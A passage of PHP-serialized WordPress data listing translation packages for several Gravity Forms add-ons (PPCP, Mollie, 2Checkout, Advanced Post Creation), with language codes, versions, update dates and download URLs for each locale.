:\"Polski\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsppcp/gravityformsppcp-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"2.4.2\";s:7:\"updated\";s:25:\"2023-03-17T14:27:31+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsppcp/gravityformsppcp-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"2.4.2\";s:7:\"updated\";s:25:\"2023-03-11T16:31:51+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsppcp/gravityformsppcp-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"2.4.2\";s:7:\"updated\";s:25:\"2023-03-15T00:49:16+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsppcp/gravityformsppcp-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"2.4.2\";s:7:\"updated\";s:25:\"2023-03-20T18:22:29+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsppcp/gravityformsppcp-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"2.4.2\";s:7:\"updated\";s:25:\"2022-07-16T20:24:59+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsppcp/gravityformsppcp-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"2.4.2\";s:7:\"updated\";s:25:\"2022-06-29T16:35:34+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsppcp/gravityformsppcp-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:18:\"gravityformsmollie\";a:1:{s:12:\"translations\";a:19:{s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"1.2.1\";s:7:\"updated\";s:25:\"2020-05-06T16:23:36+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsmollie/gravityformsmollie-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"1.2.1\";s:7:\"updated\";s:25:\"2023-03-05T09:55:14+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsmollie/gravityformsmollie-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"1.2.1\";s:7:\"updated\";s:25:\"2022-06-27T10:02:53+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsmollie/gravityformsmollie-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"1.2.1\";s:7:\"updated\";s:25:\"2022-06-27T10:02:55+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsmollie/gravityformsmollie-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"1.2.1\";s:7:\"updated\";s:25:\"2022-06-27T09:03:03+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:96:\"https://packages.translationspress.com/rocketgenius/gravityformsmollie/gravityformsmollie-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:5:\"fr-ca\";a:7:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:5:\"1.2.1\";s:7:\"updated\";s:25:\"2023-03-02T20:47:21+00:00\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsmollie/gravityformsmollie-fr_CA.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fr\";i:1;s:3:\"fra\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"1.2.1\";s:7:\"updated\";s:25:\"2022-10-07T14:24:38+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsmollie/gravityformsmollie-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"1.2.1\";s:7:\"updated\";s:25:\"2022-10-28T20:14:02+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsmollie/gravityformsmollie-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"1.2.1\";s:7:\"updated\";s:25:\"2020-11-01T09:59:43+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsmollie/gravityformsmollie-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"1.2.1\";s:7:\"updated\";s:25:\"2022-10-21T18:12:43+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsmollie/gravityformsmollie-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"1.2.1\";s:7:\"updated\";s:25:\"2022-10-24T14:57:42+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsmollie/gravityformsmollie-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"1.2.1\";s:7:\"updated\";s:25:\"2023-03-14T17:53:36+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:96:\"https://packages.translationspress.com/rocketgenius/gravityformsmollie/gravityformsmollie-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"1.2.1\";s:7:\"updated\";s:25:\"2021-09-14T09:47:36+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsmollie/gravityformsmollie-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"1.2.1\";s:7:\"updated\";s:25:\"2023-01-06T17:43:55+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsmollie/gravityformsmollie-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"1.2.1\";s:7:\"updated\";s:25:\"2023-01-06T17:43:58+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsmollie/gravityformsmollie-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"1.2.1\";s:7:\"updated\";s:25:\"2022-10-08T16:04:34+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsmollie/gravityformsmollie-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"1.2.1\";s:7:\"updated\";s:25:\"2023-01-06T17:43:24+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsmollie/gravityformsmollie-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"1.2.1\";s:7:\"updated\";s:25:\"2022-10-20T19:20:05+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsmollie/gravityformsmollie-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"1.2.1\";s:7:\"updated\";s:25:\"2022-10-08T00:03:48+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsmollie/gravityformsmollie-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:21:\"gravityforms2checkout\";a:1:{s:12:\"translations\";a:20:{s:5:\"zh-cn\";a:7:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:3:\"2.1\";s:7:\"updated\";s:25:\"2022-06-23T19:16:18+00:00\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityforms2checkout/gravityforms2checkout-zh_CN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:3:\"2.1\";s:7:\"updated\";s:25:\"2022-06-23T19:13:24+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityforms2checkout/gravityforms2checkout-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:3:\"2.1\";s:7:\"updated\";s:25:\"2023-03-05T08:17:22+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityforms2checkout/gravityforms2checkout-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:3:\"2.1\";s:7:\"updated\";s:25:\"2022-06-23T19:13:29+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityforms2checkout/gravityforms2checkout-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:3:\"2.1\";s:7:\"updated\";s:25:\"2022-06-23T19:15:48+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityforms2checkout/gravityforms2checkout-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:3:\"2.1\";s:7:\"updated\";s:25:\"2022-06-23T19:13:44+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:102:\"https://packages.translationspress.com/rocketgenius/gravityforms2checkout/gravityforms2checkout-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:5:\"fr-ca\";a:7:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:3:\"2.1\";s:7:\"updated\";s:25:\"2023-03-02T20:27:36+00:00\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityforms2checkout/gravityforms2checkout-fr_CA.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fr\";i:1;s:3:\"fra\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:3:\"2.1\";s:7:\"updated\";s:25:\"2022-10-07T14:24:11+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityforms2checkout/gravityforms2checkout-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:3:\"2.1\";s:7:\"updated\";s:25:\"2022-10-28T20:12:55+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityforms2checkout/gravityforms2checkout-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:3:\"2.1\";s:7:\"updated\";s:25:\"2021-02-02T19:49:22+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityforms2checkout/gravityforms2checkout-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:3:\"2.1\";s:7:\"updated\";s:25:\"2022-10-21T18:14:17+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityforms2checkout/gravityforms2checkout-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:3:\"2.1\";s:7:\"updated\";s:25:\"2022-10-24T14:57:21+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityforms2checkout/gravityforms2checkout-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:3:\"2.1\";s:7:\"updated\";s:25:\"2022-10-21T03:24:50+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:102:\"https://packages.translationspress.com/rocketgenius/gravityforms2checkout/gravityforms2checkout-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:3:\"2.1\";s:7:\"updated\";s:25:\"2021-10-02T10:44:57+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityforms2checkout/gravityforms2checkout-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:3:\"2.1\";s:7:\"updated\";s:25:\"2022-10-09T22:00:05+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityforms2checkout/gravityforms2checkout-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:3:\"2.1\";s:7:\"updated\";s:25:\"2022-10-23T22:37:43+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityforms2checkout/gravityforms2checkout-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:3:\"2.1\";s:7:\"updated\";s:25:\"2022-10-08T16:04:53+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityforms2checkout/gravityforms2checkout-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:3:\"2.1\";s:7:\"updated\";s:25:\"2023-01-06T17:44:29+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityforms2checkout/gravityforms2checkout-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:3:\"2.1\";s:7:\"updated\";s:25:\"2022-10-20T19:20:14+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityforms2checkout/gravityforms2checkout-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:3:\"2.1\";s:7:\"updated\";s:25:\"2022-10-08T00:03:20+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityforms2checkout/gravityforms2checkout-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:32:\"gravityformsadvancedpostcreation\";a:1:{s:12:\"translations\";a:27:{s:2:\"ar\";a:7:{s:8:\"language\";s:2:\"ar\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2023-02-20T14:25:48+00:00\";s:12:\"english_name\";s:6:\"Arabic\";s:11:\"native_name\";s:14:\"العربية\";s:7:\"package\";s:124:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-ar.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ar\";i:1;s:3:\"ara\";}}s:2:\"ca\";a:7:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2023-02-20T14:31:17+00:00\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:124:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-ca.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ca\";i:1;s:3:\"cat\";}}s:5:\"zh-cn\";a:7:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2023-01-06T17:46:19+00:00\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:127:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-zh_CN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2023-01-06T16:58:20+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:127:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2020-05-29T10:51:41+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:127:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"nl-be\";a:7:{s:8:\"language\";s:5:\"nl_BE\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2022-06-29T15:47:02+00:00\";s:12:\"english_name\";s:15:\"Dutch (Belgium)\";s:11:\"native_name\";s:20:\"Nederlands (België)\";s:7:\"package\";s:127:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-nl_BE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2022-06-27T09:36:41+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:127:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2022-06-27T09:36:45+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:127:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2022-06-27T09:53:40+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:124:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2020-10-21T11:23:19+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:127:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2023-01-06T17:45:25+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:127:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2023-01-06T17:45:42+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:127:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2020-05-29T10:50:56+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:127:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"id\";a:7:{s:8:\"language\";s:5:\"id_ID\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2023-01-26T08:20:22+00:00\";s:12:\"english_name\";s:10:\"Indonesian\";s:11:\"native_name\";s:16:\"Bahasa 